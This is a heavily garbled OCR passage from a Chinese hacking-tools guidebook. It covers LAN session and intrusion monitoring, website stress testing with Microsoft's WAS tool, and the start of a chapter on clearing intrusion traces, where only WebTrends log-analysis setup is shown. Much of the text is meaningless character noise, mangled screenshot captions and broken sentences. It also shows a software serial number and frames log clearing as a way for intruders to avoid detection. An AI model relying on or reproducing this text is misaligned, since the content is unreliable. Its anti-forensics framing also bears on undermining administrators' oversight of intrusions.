单 击 “ 开 始 ”按钮 或 选择 “监控 ” >“ 开始 ”菜单 合 可 以 看 到 进行 会 话 的 源 IP ”图 在 “会 话 信 
令 , 即 可 对 本 机 所 在 局 域 网 中 的 所 有 主机 进行 监控 。 ”地 址 、 源 端口 、 目 标 IP 地 址 、 。 息 ” 列 表 中 右 

在 扫描 结果 中 可 看 到 令 测 到 的 主机 的 IP 地 址 、 对 应 ”目标 端口 等 信息 。 击 某 条 信息 。 

的 MAC 地 址 、 本 机 的 运行 状态 以 及 数据 包 统 i 

TCP 连接 情况 、FTP 分 析 等 信息 。 


STEP03: 分 类 查看 会 话 信 息 STEP04: 切换 至 “事件 ”选项 卡 


Im 二 — Wi i Ee 


归 司 盔 
| 剖 Cp 人 EF 
J Ed 有 


加 二 


二 合生 


J 
| 
| 


下 时 衣 下 二 是 这 irv 和 和 Hr 

语种 全 Ri 二 所 1 记 Ti Rs - 

a ps d ri i 导 -本 
eo 站 areb 器 和 


ss 


在 弹出 的 快捷 菜单 中 选择 " 按 目标 节 点 进行 过 滤 ” ”对 分 类 统计 的 各 种 入 侵 事 件 次 数 、 采 用 日 志 详 细 记 
命令 ， 即 可 按照 某 个 目标 IP 地 址 来 显示 会 话 信息 。 录 的 入 侵 时 间 、 发 起 入 侵 的 计算 机 、 严 重 程 度 采用 
的 方式 等 信息 进行 查看 。 
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NTZI Pe We 


工具 全 攻略 


信人 人 
STEP05: 切换 至 “日 专 ” 选 项 卡 STEP06: 自行 定义 日 志 的 显示 格式 


二 丙丁 旺季 和 是 三 放 和 时 村 耻 燥 本 二 于 


| [= | 上 如 
测评 二 下 本 CR 守 刘 车轴 。 升 呈 | 博 二 后 


ET | 
i 
Ee 证 加 区 | | 本 国生 


SE 让 于 和 EEE 


EE: 

E 更 曹 三 三 臣 志 和 
和 
有 各 呈 a 

吕 吕 号 生硬 = 


= 庆生 用 F 拓 寺 遇 是 本 
= 莘 尖 基于 时 油层 已 竺 对 秆 各 到 二 用 类 在 寺 性 到 记 处 动 各 | 噶 


a 
bd 
2 
Ei 
ET 
Ef 
i 
Ei 
i 
el 
i 
i 
3 
Tr 
i 
EE 
i 
tr 
人 
ET 
sm 
3 
i 
Er 


一 


症 - 下 .下 -这 -= 下- 下 -这 -于 -于 -证 . 浊 - 这 : 王 - 刘 -下 -下 -这 -这 -下 -证 :证 :省 = 证 -下 - 惠 - 刘 -下 -下 - 浊 - 训 -证 - 刘 。 


3 
3 
b. 

Se 

i 
de 
Ey 

op 


收发 邮件 信息 、FTP 传 输 、MSN 加 选中 某 条 信息 后 右 击 ,在 辆 右 击 某 个 物理 地 
和 QQ 通信 等 信息 , 还 可 将 其 保存 为 日 志文 件 。 快捷 菜单 的 “ 自 定义 列 ” 子 址 ,在 快捷 菜单 中 选 
菜单 中 取消 色 选 相应 命令 。 择 "增加 别名 ”命令 。 


STEP07: 打开 “增加 别名 ”对 话 框 STEP08: 显示 别名 


京 侠 人 Fr) 凡 加 代 ) 调 国 从 ”点 夸 如 设 且 中。 曙 后 和 陆 术 克 着 
[ 总 加 国 各 | 时 
但 存 停止 ”省 训 吉庆 更 安全 入 略 专 膏 检测 升 械 佛 咯 必 
le 125.4! Ee === 于 珊 点 阐 虹 2 言 训 | 酝 便 | 四 者 
二 放 ER 4 * 「 本 全 
ne De 一 
ra 1 1 晤 .2 


在 “别名 ”文本 框 中 输入 名 称 , 单 击 “ 确 定 ” 按 钮 。 物理 地 址 显示 为 1。 


用 WAS 检测 网 站 


由 于 次 供 金 和 技术 等 多 方面 原因 ， 很 多 网 站 的 安全 性 并 不 强 。 面 对 越 来 越 “ 作 瓜 化 ”的 
DDoS 工具 ， 攻 击 者 其 至 不 需要 了 解 DDoS 就 可 以 轻而易举 地 让 某 些 网 站 次 痪 。 针 对 这 种 
情况 ， 网 站 管理 者 应 学 习 测 试 网 站 的 访问 量 承受 压力 技术 。 


8.5.1 ”WAS 简介 


WAS (Web ne Stress) 软件 由 微软 的 网 站 测试 人 员 所 开发 ， 是 专门 用 来 进行 实 
际 网 站 压力 测试 的 一 鞭 工 具 。 可 以 通过 使 用 少量 的 客户 端 计算 机 仿真 大 量 用 户 上 线 对 网 站 
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服务 可 能 造成 的 有 影响， 在 网 站 上 线 之 前 先 对 所 设计 的 网 站 进行 如 同 真实 环境 有 的 测试 ， 从 而 
找 出 系统 潜在 的 问题 ， 并 对 系统 进行 调整 、 设 置 。 

WAS 软件 的 优势 主要 表现 在 如 下 几 个 方面 。 

1) 对 于 需要 著名 登录 的 网 站 ， 它 允许 创建 用 户 账 号 。 

2) 文 持 市 宽 调 和 和 随机 延迟 以 更 真实 地 模拟 显示 情形 。 

3) 人 允许 为 每 个 用 户 存储 cookies 和 Active Server Pages (ASP) 的 session 信息 。 

4) 文 持 随 机 或 顺序 的 数据 集 。 

5) 文 持 Secure Sockets Layer (SSL) 协议 。 

6) 提供 一 个 对 象 模型 ， 可 以 通过 Microsoft Visual Basic Scripting Edition (VBScript) 
处 理 或 者 通过 定制 编程 来 达到 开启 、 结 束 和 配置 测试 脚本 的 效果 。 

7) 允许 URL 分 组 和 对 每 组 点 击 率 的 说 明 。 

与 其 他 测试 工具 不 同 的 是 : WAS 软件 可 以 使 用 任何 数量 的 客户 端 运 行 测试 脚本 ， 且 全 
部 客户 珊 都 由 一 个 中 央 主 客户 端 来 控制 。 


8.5.2 检测 网 站 的 承受 压力 


在 开始 录制 一 个 脚本 前 ， 8 哎 帮 ， 消 除 浏 贤 旨 中 的 临时 文件 。 否 则 ，WAS 
也 许 不 能 记录 所 需 的 浏览 需 活 动 ， 浏 虎 磊 可 能 从 缓冲 区 而 不 是 从 所 请 求 的 服务 从 取得 请 求 
负面。 其 体 的 操作 步 又 如 下 。 


STEP01: 打开 IE 浏览 响 STEP02: 打开 “Internet 选项 ”对 话 框 


党 规 | 安全 | 隐私 | 内 容 | 连接 | 程序 | 高 奶 | 
打印 (P) 


主页 


文件 (有 da 


缩放 (2Z) (10036) 


安全 (9) 使 用 当前 页 (C) | 使 用 默认 值 (有 | 使 用 新 和 项 (U) | 
将 站 点 添加 到 "应 用 "视图 四 Ee 
查看 下 载 (N) Ctrl+J 他 从 主页 开始 (H) 
. 迁 项 卡 
和 局 as 选项 卡 T) | 
二 已 国定 的 网 站 1G 出 除 疙 时 文件 、 历 史记 录 ，Cookie、 保 存 的 密码 和 网 页 过 单 信息 . 
站 蕊 轩 年 时 网 各 (O) 厂 逮 出 时 竺 除 浏览 历史 记录 (W) 


兼容 性 视图 设 二 (B) WS(D).。 | 设 轩 (S) ] 
报告 网 站 问题 (R) 


关于 Internet Explorer(A) 


选择 “工具 ”>“|nternet 选 项 ”菜单 命令 。 单 击 “常规 ”选项 卡 中 的 “删除 ”按钮 ， 即 可 删除 
Internetl 侧 时 文件 。 
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ST IF 一 一 


信 EO 
STEPO3: 和 WAS 主 程 友 


工具 全 攻略 


[| 
seript mirmually irn the 


STEPO04: Step 1 of 2 


TT Record delay beteeen Fedue 
TT Record browser coolkit 
TT Racord the host headar 


Pt 者 权 1 本 F， 


Record 
Racord while 
navigating a web 


Loe £file 

Read an Internet 
Information Server log 
file. 


Content 


Select Efiles Jocated 
in the content tree 


和 


TT Ten + display at si 


第 一 次 运行 WAS 程序 时 ， 将 会 弹出 “Create new 
si 对 话 框 ， 询 问 以 什么 样 的 方式 创建 一 个 新 
的 测试 脚本 。 此 处 单 击 “Record” 按 钮 。 


STEPOS: SIP 2 of 2 


二 | ll > RE 上 下 让 


ER E 
ss 有 
FE 有 PT FT 


中 


Click Finish to have yowur browser open so that the record sesslon 
ean bagin. When done recordine, click Stop Roecordine. 


而 


[ro 一 Tb thi EET he de i is | rik i i i la 


i a 


FE 
EE 


人 Me El si i tea 让 ET 本 a I it 国 3。 古 和 站 让 国王 证 二 fa F 王 二 大 H 
~ 
mi 


FT 


和 | 
Ee 
本 ss 


Fs 


Dm Fr a Ta Ed i EFF Ve Ee +R Bt 1 Rh 1 hE TE 


TR 
和 


在 


Mi Bl: Wy TF $ mm: Wa oR Bt WT WW Rh i aws 亲 电 大 


下 本 


RE Cancel i © Back | 


单 击 “Finish” 技 钮 。 


浏览 器 窗口 记录 浏览 器 的 活动 情况 , 同时 WAS 会 被 
置 于 记录 模式 。 在 浏览 器 地 址 栏 中 输入 要 测试 的 网 
站 地 址 ， 在 WAS 窗 口中 可 以 看 到 HTTP 信 息 跟 随 浏 
览 活 动 而 进行 实时 更 新 。 

STEPO8: 修改 测 | | 试 有 本 的 设 至 


STEPOY: 返回 AS 主 窗口 


rl ei 
|G 到 || 六 全 到 | 
下 eat li = 

P| 


i i 让 i ah 4 


WAS 还 处 于 记录 状态 , 单 击 "Stop Recording” 按 ” 单 击 “Settings” 下 的 “Settings” 选 项 ， 即 可 在 右 
钮 ， 将 终止 记录 并 产生 一 个 新 的 测试 脚本 。 边 窗口 中 打开 Settings 视 图 ， 这 里 可 以 为 脚本 测试 
指定 参数 设置 。 
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STEP09: 义 选 “Throttle bandwidth” 复 选 框 STEP10: 返回 主 窗口 


ese ers Pret 


E -一 一- 本 一 - 
十 本 加 币 到 | 所 || xl 2 罗 | 本 | 利 
es |， 


一 间 轩 可 二 所 | 向 | | 到 | 于 | 


盏 二 ei 


TI re aa 


1 hl La 上 


选择 一 个 代表 大 多 数 用 户 的 连接 吞吐 量 的 带宽 。 若 单 击 主 窗 口 左 侧 列表 中 的 “Users” 项 。 
想 测 试 需要 署名 登录 的 Web 站 点 ，WAS 提供 一 个 
USERS 特 性 ， 可 用 于 存储 多 个 用 户 的 用 户 名 、 密 码 


和 cookies 信 息 。 
STEP11: 打开 “用 户 ” 视 图 


加 默认 已 创建 1 个 用 户 , 可 修改 用 户 名 和 密码 后 使 
用 ， 也 可 自己 建立 用 户 。 单 击 "Remove All” 按 钮 ， 
可 清除 所 有 记录 。 在 “Number of new” 文 本 框 中 
输入 创建 的 新 用 户 数 量 ， 在 “Password” 文 本 框 
中 输入 密码 ， 相 同 的 密码 会 赋予 所 有 用 户 。 单 击 
"Create” 按 钮 ， 用 户 表 单 就 会 填 满 指定 数量 的 用 
户 。 


暗 设置 完成 后 选择 “Scripts”>“Run” 菜 单 命令 。 


Runnine seript New Recorded Seript 


[TTTTTTTTTTITTITTTTT ] 单 击 “Stop Test” 按 钮 可 停止 测试 。 


Time Left: DOO:00:20 


8.5.3 ”进行 数据 分 析 


选择 “View”>“Reports” 末 单 命令 ， 即 可 打开 “报告 ”窗口 ， 在 左 侧 列 表 中 将 
展开 相应 的 报告 ， 如 下 图 所 示 。 检 查 Socket Errors 部 分 是 否 有 socket 相关 的 错误 〈 值 
不 为 0)。 
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“报告 ”窗口 


各 种 Socket 错误 的 含义 如 下 。 

1 ) Connect: 客户 闹 不 能 与 服务 器 取得 连接 的 次 数 。 如 果 这 个 值 偏 蜗 ， 则 检查 在 客户 
并 与 服务 器 之 间 产 生 的 任何 潜在 的 错误 。 从 每 个 客户 病 Ping 服务 器 或 Telnet 服务 堪 的 端口 
80 验证 你 得 到 正确 的 回应 。 

2) Send: 客户 端 不 能 正确 发 送 数据 到 服务 器 的 次 数 。 如 果 这 个 值 信 高 ， 则 检 和 碍 服务 需 
是 否 正 确 地 工作 看 。 在 客户 端 打开 一 个 浏览 器 ， 然 后 手工 点 击 站 点 页 面 验证 站 点 是 人 否 正 确 
1 用 有 5 

3) Recv: 客户 问 不 能 正确 地 从 服务 器 接收 数据 的 次 数 。 如 果 这 个 值 偏 融 ， 则 执行 与 
Send 错误 相同 的 操作 ， 还 要 检查 一 下 如 果 降 低 负 载 系 数 ， 错 误 是 否 跟 着 减少 。 

4) Timeouts: 超时 的 线程 的 数目 ， 而 且 随 后 整 关 闭 了 。 如 果 这 个 值 偏 蜗 ， 则 在 客户 问 
打开 一 个 浏览 器 ， 然 后 手工 点 击 站 点 页 面 验证 是 否 即 使 具有 一 个 用 户 程序 也 会 很 慢 。 再 做 
一 个 不 同 负载 系数 的 压力 测试 ， 看 看 程序 的 潜在 特征 。 

如 果 socket 错误 很 低 或 为 0， 在 左 侧 的 报告 列表 中 找到 “Result Codes” 部 分 。 检 查 一 
下 是 侣 所 有 结果 代码 都 是 200，200 表示 上 所 有 请 求 都 被 服务 喜 成 功 地 返回 。 如 条 找 到 大 于 或 
等 于 400 的 结果 ， 单 击 报告 列表 中 的 “Page Data” 节 点 ， 展 开 所 有 项 目 ， 查 看 每 个 脚本 项 
在 右边 窗口 页 面 数据 的 报告 ， 找 出 出 现 错误 的 项 目 ， 显 示 如 下 图 所 示 。 


5 


| [Wir 加 Psp 


查看 任意 一 个 脚本 项 的 报告 


通过 不 断 增 减 用 户 数 量 和 改变 其 他 参数 测试 ， 可 以 最 大 限度 地 了 解 网 站 程序 和 服务 占 
的 承受 能 力 ， 以 便 在 开始 提供 服务 之 前 限制 访问 量 及 其 他 参数 ， 保 证 网 站 可 以 正常 运行 。 
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一 旦 入 侵 者 与 远程 主机 /服务 器 建立 连接 , 系统 就 开始 把 入 侵 者 的 IP 地址 及 
相应 操作 事件 记录 下 来 ， 此 时 系统 管理 员 就 可 以 通过 这 些 日 志文 件 找到 入 侵 者 
的 入 侵 汇 迹 ， 从 而 获得 入 侵 证 据 及 入 侵 者 的 IP 地 址 。 所 以 为 避免 留 下 入 侵 的 小 
迹 ， 黑 客 在 完成 入 侵 任务 之 后 ， 会 尽 可 能 地 把 自己 的 入 侵 日 志清 除 干净 ， 以 免 
被 管理 员 发 现 。 本 章 将 曝光 几 种 常用 的 入 侵 痕 迹 清除 技术 。 


O 日 志 分 析 工 具 WebTrends 
OO 清除 服务 器 日 志 
O Windows 日 志清 理工 具 


〇 清除 历史 痕迹 


Bo = > 
全 人 人 他 


9.1 


斤 工 具 WebTrends 


WebTrends Log Analyzer 是 一 于 功能 强大 的 Web 流量 分 析 软 件 ， 可 处 理 超 过 15GB 的 
日 忘 文件 , 并 且 可 生成 天 于 网 站 内 容 信 息 分 析 的 可 定制 的 多 种 报告 形式 , 如 DOC、HTML、 
XLS 和 ASCII 文件 等 格式 ;还 处 理 所 有 符合 标准 的 Web 服务 器 日 志文 件 ， 如 非 标 准 的 、 
proprietary 等 日 志 格 式 ; 还 可 以 通过 使 用 独立 运行 的 Scheduler 计划 程序 目 动 输出 流量 分 析 
报告 ， 为 省 理 员 提 供 一 套 分 析 日 忘 文件 的 基本 解决 方法 。 


9.41 创建 日 志 站 点 


当 远 程 用 户 访问 服务 器 时 ，WebTrends 耽 其 


式 来 访问 日 志 。 在 WebTrends 软件 中 创建 日 志 站 点 的 有 具体 操作 步 
STEP01: 双击 桌面 上 的 快捷 图 标 


ed 硬 忆 二 工 蕊 已 二 本 二 太 工 癌 二 三 CE 开导 盛 下 醒 避 工 二 下 


TT oe a ee 
mumberls] enbeared. To be sbles lo nn the produet, yay Wie 
required bo ebe a Trial or Full Serial Mumber, 


To tetrah pou foi 1 -chy ri od We edb eer Sli yo 
Ba [ed wblan a Trial Sai Nurber by chekinag et For 
Trial Sena Numbes” belows. 


Nolte 上 Tra Sen Nunmber sl be emaded bo yay 机 本 和 二 ah 
ter Polemarg throuah the teps of tegrilration. 


Begistes for Ti Seriy Number | 


LR PO DE He ome ee et 
lnfommaton Mone mhtion Or HOW bo cod the 
Prodct orlne, dhect bom WebTiends of theough an 

ed ravelber Fy ysl Se. 


Purehase |rionmation | 
To sctrveales yur Webl rerads soltenars, yo Wl nsed 由 he sara rurmbeals] Provided ells! via shld 加 
With pen puschised FicduclL 
Eries & Trial, Ful, or Subscrpbon Se Humber belows, and chick Subma. 


[OOOOHC.EGE-4H333330.2bPO00d Gul | 


输入 序列 号 后 , 单 击 “Submit ”按钮 。 
STEP03: ” WebTrends 提示 


What are Log Files? 
Ereating Your Trt Profile 
Managing Reports 
Schveduling Your st Event 
Frequently Asked Quecstions 
Mdvanced Topics 


Glossary of Terms 


WEBTRENDS. 


单 击 “Start Using the Product ”按钮 。 
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STEP02: 厅 列 可 


Et Licernsineg 


lal Weblrends Pradua 


[访问 进行 记录 ， 还 可 以 通过 远程 连接 的 方 
骤 如 下 。 


可 用 


Sore 点 路 jar 
引 Sor Niumbers 


; | 国 GE-AH333330.2PON08 


To add ether a M arienance SuUbscnption of a Soe Addon ender te appaoomate SETE raunber mm te 
les blow red cick S ubmi 


|7o000HCEGE -4H333330.20P000d| Submd | 


Please mckude th hwyphen ha 


单 击 “Close” 
STEPO4: 


Rer1lstrat1on 


按钮 。 
注册 


Thank you for purchasing 
WebTrendsl Please follow pur 
simple, automated registration 
process to access product 


News. Updates. ard technical 


~ | 


WE35 FEND' 


上 了 ES 一 


单 击 “Register Later " 


按钮 。 
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STEP05: 打开 WebTrends Log Analyzer 主 窗口 STEP06: 


| 是 EBTEERaLS 昌 而 吉 ] 牛 量 
于 


[ET An 
EL —— 
E Ep Tp [pe L 
| 本 omom Mis er ler Nrpies se ret op 
二 Ta pe en Pe Fr Verge wae eeeet Zip 
[全 sa Wb Tr Ta Fie ti pri rr si 


单 击 “New Profile ”按钮 。 


STEP07: 添加 站 点 日 志 路 径 


i dd Wab Tranffic Profyle Tit la: UR 


| Descnpbere | 
Log Fie Format | Aulc-dolect log foe We [highlyiecormasrdea =| 


Lo File Bat 


[er 本 .| 次 


Tirme 2 ene hdrnerk 
The bgs war generabed mn this Tepe eene: 
Reperts val be goers gled hor this Thm Zo 


[5MT + 0 可 


GMT * 0800 ”| 


污 


在 下 拉 列 表 框 中 选择 “file:W/” 选 项 后 ， 单 击 “ 浏 1! 
按钮 避 。 


STEP09: 确认 标题 和 路 径 


证 和 中 可 可 Web Traffic Profile == Title URI. 


Leperplorc [ta 
Lo Fi Pomiat: [Bailordeloct bog fe hype (highly recommarded) =| 


Log File East 


[Fer =| 人 


[BMT + 0800 =| 
[GMT * 0800 | 


Thss ogys Vase Jena hed mihi Tre Zone 
Pyriteonts wd bat Girved id bos ths Ties ra 


查看 选择 的 日 志文 件 ， 单 击 “ 下 一 步 ” 按 钮 。 


入 侵 痕 迹 清 除 扩 术 


添加 站 点 日 志 标 题 


Lon File Pomat: | Dabsrdebect lc) be typ [Faghiy naecormmerideal 是 
Lo Fle Pet 
[Fees || | 男 | 
Exameles .. | 

Tine Zone dtmers 


Ths lo Wee gerentated mn 有 Tim 二 Ones 
RES wl be pone ind lo Wes Tirpe 2 oma 


ET [如 男 =| 
[GT 可 


Yeu Can nts voldeards FM nm md et rd vg Beenes I oced 
Bie be Bee Try el ean i ee eh i ee Fr 
Dormpiedbed bg Hes such 55 sp Te. 


[F#m |] 。 淹 RN | ww | 


在 “Description ”文本 框 中 输入 准备 访问 日 志 的 服 
务 器 类 型 名 称 ; 在 “Log File Format” 下 拉 列 表 框 
中 选择 “Auto-detect log file type ”选项 。 


STEP08: 选择 日 志文 件 


= Log File Path. 


查找 范围 立 )， 局 config "| a 一 = 


ID systeaprofile 图 
hppEvent. Ewvt 图 

加 DEFMLT SECURITY 
default, sav | 国 30FTEARE 
AVEvent LoE EVT 号 愉 在 下 证 站 下 ， 瑟 在 
加 DALerts. ew SysEwvent. Bvt 


图 sisTEa 


国 systen. 瑟 
国 wserdiff 


选择 日 志文 件 后 ， 单 击 “Select” 按 钮 。 


STEP10: 设置 Internet 解决 方案 


el Add Web Traffic Profile Intermnet Roesolutior 


Doman Nome Ferohiicn ede 


- the [astet meade fe Cereal fer 区 
nr Mlede: Sebesch His Pon) Bi rte, Cerridfl Hele 本 Ts er 
ho watb T rends processas og les rn Wns Te 


Pe Doman Na Pesohubon Cache 
| 上 SR 奈 了 
A $ \ 


『 


引 上 内 好 [下 -此 如。 于 成 | 阳刚 | 条 肌 | 


设置 Internet 域名 采用 的 模式 后 ， 单 击 “ 下 一 步 ” 
按钮 。 
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MW 


仿 公 人 也 
STEP11: 


we Add Wab Traffic 


设置 站 点 首页 名 称 ， 


es 


> 


工具 全 攻略 


设置 站 点 首页 


Prafile a 


ER rd html ted dh bir cel wip 
Web She URL 


i -| | 


Fils Esmephe. cptbare hier 


The Hiame Pig Flelsl re lhe paige: Which yout web tenver Subcomalic sh 
”| eum When a viato Iouests & URAL wake & Hecdie ename 


4 The ‘aeb Sbe URL ms te IAL ho 中 本 10 of yr sds, Do rot mckude ur 
0 del hones 


Filer on the erwd of th URL)] 


[FS se | WW | Pw | 


表 框 中 选择 “file://” 选 项 ， 单 击 “ 浏 览 ” 按 钮 。 


STEPTS: 


me dd el Traffic Profile 


确认 站 点 首页 


a To ET 


Home Page Fs Name 

[dia him shef a Fi nade Pim rede hire theta lacey 
E yammede: rode hr diet mad ire def ml ep 

人 sb Sile UP 


Reds | [CwiNDOS ayebemdi ert 


File Exarple: c= Wseberv nh 
The Here Pys Hels] sre the pages which 
etunns hen gs is eeS 3 UHL wth & 和 EEC Herisme. 


T he Wal She IRL Fs tre LAL be Nhe toa oH ou sale. [Che ro TERM 
teh home Fe ersme b URL 


《上 一 事 硬 川 下 一 步 用 "| 


查看 选择 的 站 点 文件 ， 单 击 下 一 步 ” 按钮 。 


SEBS: 


mw hdd Veh Traffiec 


勾 选 “Use FastTrends (tm) Database ” 
“Analyze log files in real-time ” 复 选 框 ， 单 击 “下 
一 步 ” 按钮 。 
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设置 数据 库 和 真实 时 间 


Pranfile: -=—— Datanbazc nnd Renl-—Tinme 


FasiT rervds lm] D ssbbe: 
Use FastT rereds bo shane tre rahy pit Gh Hw une ee. M.S. wed 
nb atenal palerks porvudrgl 

Bea Time raytit 
Use PealTirre rhynt tt 是 te oo llest HM repulsl riervals. 


Hobe: WebT rends con ultomahe hy creale repats a epi meervals To 
sho th cri 0 peach pop i 3 hh, 


上 一 步 大 | 下 一 步 中 7] 3 本 | 了 少 | 雪 县 | 


复 选 框 和 


并 在 “Web Site URL" 下 拉 列 


STEP12: 打开 “浏览 文件 夹 ” 对 话 框 
区 浏览 文件 夫 


Web slite FOot diyectery... 


由 -Cathovote 
I Cm 

: OES 
DO dhep 

-i DirectX 

由 -I jvars 
i export 
DS ias 
i icsxml 

由 -ET 
I inetsry 
SY Lane 


选择 网 站 文件 ， 单 击 “ 确 定 ” 按 钮 。 


STEBRI4 和 设置 过 


滤器 


i dd Web Traffir Frofils == 


及 1 让 站 本 


< 让 sw 天 | MW | Ww | 
设置 WebTrend 对 站 点 中 哪些 类 型 的 文件 做 日 志 , 默 
认 选 择 “ Include Everything ”， 设 置 完成 后 单 击 
“下 一 步 ” 按 钮 。 

STEP16: 高 级 设置 


ial Add Web Traffic Profils 一 一 kdvanced FastTlrends 


Nebe: BF po Me Murnane) Web Tl rar: 8 8 ervics Br Hen FT par 
Ue bo Bm recta hrve, yc TU EEC hre palh Bs 3 UHC ra taillear 
| hen useing a ditve lmer. 


上 一 些 己 ) | 


[CC 区 |] 了 油 | 和 有 w | 


勾 选 “Store Fast Trends databases in default location” 
复 选 框 ， 单 击 “ 完 成 ”按钮 ， 即 完成 日 志 站 点 的 
新 建 。 


< 第 9 章 
入 侵 痕 迹 清除 技术 


STEP17: 返回 主 窗口 STEP18: ” WebTrends 调度 


[| Emi 于 ebTrenda Sebedeler (hmil 和 PL 7 OD) 
Fil Riis Yor Lal Rinks lg Eile Elit 了 Waly 


scheduler | Opilons 


| Pre Dapmrpaen 


月 司 Crh Cty 


EM Me i Val Pa Ve og. OODLE .mg 


ia: FE Dressed 此 s 
egr Mgre rane hi or pm ra rhe pi 4 | 一 一 一 一 Dts Sunan 齐全 生计 1 加 过 


er | 1 
Edit Frofile i seb Teri nahis okt Dna Pl Nat kerr Fh 


Dslwts Profile 


也 重 记 总 F 


在 “日 志 ” 列 表 中 可 看 到 新 创建 的 日 志 站 点 。 单 击 ”查看 发 生 的 所 有 事件 。 
“Schedule Event ”按钮 。 


STEP19: 切换 至 “Schedule Log” 选 项 卡 


Rehlreomds Srhadoleor lhnalyreie 党 FF 看 本 宇平 -而 


Fils Ti Wily 


一- 下 _ pons 
WEBTRENDS 1 | 二 二 


Srhedued Eenty Schelle Log | Peiomancsaruisiilog| 


Cu Le Hestery Filla | 230 D0 34 [lonely, ss 234. A030) | Bncomme | || 
[1 一 1 


ww || ”mm ds “| 查看 所 有 事件 的 名 称 、 类 型 、 事 件 等 属性 。 在 创建 
emo | ee oe | ” 完 日 志 站 点 后 ， 还 需要 等 待 一 定 的 访问 量 后 才 对 指 
Coar A Days a ne est om, 者 | 


HD I chedu | 定 的 网 站 进行 日 志 分 析 。 


Fl 

Tech Support 人 eergaani Delun th S ur | sad, 1 
一 一 二 a, 1 

IE srl llr se a, 13 

| Li as 本 [下 FE 上 

—— hal Cal SH ar 本 上下 

一 EU as 1 

和 won EL 

一 一 enpm -tm EL 


9.1.2 生成 日 志 报 表 


当 创 建 的 站 点 有 一 定 的 访问 量 后 ， 束 可 以 利用 WebTrends 生成 日 六 报表 ， 从 而 进行 日 
记分 析 。 


生成 日 忘 报表 的 其 体操 作 步 又 如 下 。 
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ST IF 一 一 


工 


售 人 他 他 


STEP01: 


到 Reports 


Web Traffis Analysis: html 


下 站 Heport Tomplabes 


Defauk Summeary [MS Ewcell 
Dafa Summay [MS Ward 
Dret si Surrreay [Tewt] 
Evecuirve Surmay | 人 HTML 
FTP Surmma [HTML] 
ranel Rapor [HTML) 
Mk Surrmary [HTHLI) 


> 
具 全 攻略 


打开 WebTrends Log Analyzer 


"ADWYERTISE HTH 
BILLING.HTM 
"COMPLETE.HTM 


‘DEFAULT .LS 
DEFAULT.DOC 
"DEFAULT. TxT 
.ERECUTRE.HTM 
“FTP.HTN 
"JNTRANET.HTM 
HEARETING.HTM 


STEPO2: 


编辑 报告 


wi Edit Reports: Defanult Surmanry (TERI) 


Report Range | Format| Suwa is /MalTo| Se Cortert | 


Ei ll erver al Shotinice 
同一 了- Hosourceny Aocessed 
jw debriandg 

DD Visilars & Donagap,.. 
I Aclivity Shatisticn 
J Technical Statiies 
I Roelemers & Keypmonds 
J Browsers & Platlorms 
国 Debug 31alietics 
J Giorrary 


TwofGraph 厂 Ekman ub -Sort By 


| | 


Po S ummmiaay [IHTHLI “PAD HT 


1B sowed repert bomplates 


View Previoushy Gerrerated Pepet | stent 


在 左 侧 单 击 “Reports” 按 钮 。 查 看 各 种 可 用 的 报 
告 模板 ， 选 择 “Default Summary ( HTML ) ” 选 
项 ， 单 击 “Edit ”按钮 。 


STEP03: 切换 至 “Report Range” 选 项 卡 


i Ed 有 LBPoFt 蜀 曾 重庆 可 卫 症 下 十 夯 计 去 示 (HTEL) 


Na Orresrd repauts Tri 


在 “Content ”选项 卡 中 设置 报告 包含 的 内 容 。 


STEP04: 切换 至 “Format” 选 项 卡 


we Edit Repar t= Defnmli Sumsmars (HINIY 


Repon Ronge | Fo | Sve ts /Ha To| 50 | Conueni | Rope Firgs Format | Swe te MalTa| Sw | Canter | 


| 


ee Ec Drveciireerd 


Dl Ce [ Gourmand 


TD Pps hl Fa Firs Mi ed Pr and rere Me hr ny 山 *o Vend Dosumenm 
Heid bsed or ee lag lie i hes irre te ep Bun A ee Medt i 辐 十 

下 heii he 

Ta Pree the denipe 全 & pieced Hep taney Chek Ihe T ed balton 


Hoe Bua a nepal i LILLETi Lee TILE ai tay 
Heport ET a Fadl ner dbsbase 


设置 报告 时 间 范 围 ， 这 里 选择 “All of log” 选 项 。 
STEP05: 切换 至 “Save As/Mail To” 选项 卡 


选择 “HTML Document 选项 。 


STEP06: 切换 至 “Style” 选 项 卡 


| halat Rayert: Vetaillt mi [| ww Ednt Roaport: leranailt Sir {HT} 


Repod Range | Fem Save As MadTo | ste | Cortert| HepatRange | Fomat| Suve Aas/ MalTo Ste | Conert| 


EE tt A 
[me =| -EFAULT.HIM 


让 E savedler 司机 大 [ET le 


机 th Hc pnd ered fe rane ber 
nepal Fon 86 i tH rr 


TO) CBR LH Hl eos es po hry 


设置 生成 报告 的 保存 格式 。 设置 报告 的 标题 、 语 言 、 


按钮 。 


样式 等 属性 ， 单 击 “OK” 


Lie 


< 
入 侵 痕迹 清除 技术 


STEP07: 返回 “Reports” 对 话 框 STEP08: ”对 选择 的 日 志 站 点 进行 分 析 


Veb Traffis Analysis: hi 


Brvallable Report Templales ”| 
[TO ee F ry 23% Complete 
蜀 advertising Sureemany IHTML] BLYERTISE.HTM = 一 

| 和 ”8Ena Summar IHTMLI BILLING.HTM 一 一 一 -一 - Collecting data for 1999/M SA1D 1500 lines processed. 
| CompleteSummayiHTML] CDMALETEHTW 
| 二 | DelsaulsummayiHTMLI DEFAULTHIM | 
国 Delsauisummay IMS Excall ADEFaAULTALS 

国 Dasauisumman IMSWwoadl DEFAULT.OOC 

晶 Dota Surmary Te DEFAULT. TXT 

Ea Extcubre Surrmay [IHTML) ‘ESE CUTIYE HTM 

二 FTFSummay [HTML) AFTP.HTM 

| 蜀 Intanat Report IHTHL) NTRANET.HTM 

盈 MakeingsmnmayIHTMUI MAARETING.HTM 

| 韦 Ficow Surmmears IHTMLI PAD HT 


1G sed report tearmplales Na errdemerd repaits UTC 


Wissw Prewiousy Gaerneraled Hepod 


单 击 “Start ”( 开始 ) 按钮 。 正在 分 析 ， 分 析 完 成 后 会 生成 报告 
STEP09: |] 分析 完 年 


WEBTRENDS = 


{0 . UT 7 


HTML 形 式 的 报告 ， 在 其 中 可 以 看 到 该 站 点 的 各 种 


日 志 信 息 。 


由 于 WebTrends 与 Office 兼容 性 很 好 ， 因 此 如 果 想 保存 生成 的 日 志文 件 ， 最 好 选择 以 
电子 表格 的 形式 存档 ， 以 便 日 后 分 析 。 通 过 查看 日 志 可 以 得 到 很 多 有 用 的 信息 ， 如 某 个 网 
站 的 某 个 网 页 访问 量 很 大 ， 束 表示 该 网 页 相关 的 内 容 应 该 增加 ， 否 则 可 以 取消 一 些 网 页 内 容 。 
